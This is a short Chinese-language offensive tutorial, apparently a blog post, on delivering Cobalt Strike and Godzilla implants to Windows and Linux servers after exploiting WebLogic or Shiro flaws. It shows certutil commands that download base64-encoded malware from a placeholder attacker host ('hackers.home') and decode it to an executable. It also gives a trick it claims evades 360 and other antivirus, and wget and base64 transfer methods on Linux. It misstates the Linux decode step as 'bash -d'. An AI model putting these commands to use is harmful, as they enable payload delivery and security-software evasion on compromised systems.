Windows篇

当我们拿到了一个weblogic,又或者是shiro漏洞后,如果没有上传界面的利用,又该如何上cs马、哥斯拉马呢?

Windows的命令行远程下载神器-CertUtil

Windows中有一个名为CertUtil的内置程序,可用于在Windows中管理证书。使用此程序可以在Windows中安装、备份,删除,管理和执行与证书存储相关的各种功能。

CertUtil的一个特性是能够从远程URL上下载证书或其他任何文件。

使用语法:

certutil -urlcache -split -f [URL] output.file

混淆方式

使用CertUtil+Base64绕过安全软件。

先通过base64对恶意文件进行编码,使得恶意代码看起来像是无害的文本文件,再使用CertUtil.exe下载后对其进行解码。下载后再使用:

Certutil.exe -decode将Base64编码文件解码为可执行文件。

certutil -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
certutil -decode bad.txt bad.exe

而如果直接使用certutil命令下载外部文件这个时候如果有360或其他杀软,会报毒:

这个时候使用如下手段即可绕过:

certutil&&certutil -urlcache -split -f 

Linux篇

linux直接采用wget+url的方式就可以轻松的下载到我们需要传上去的马。

另外万一传输中有检查与限制,可以直接使用linux内置的:

base64 +文件名

就可以把文件中的内容进行加密了。

当然也可以再使用bash -d进行解密。再使用echo > 文件名就可以直接写入到文件内。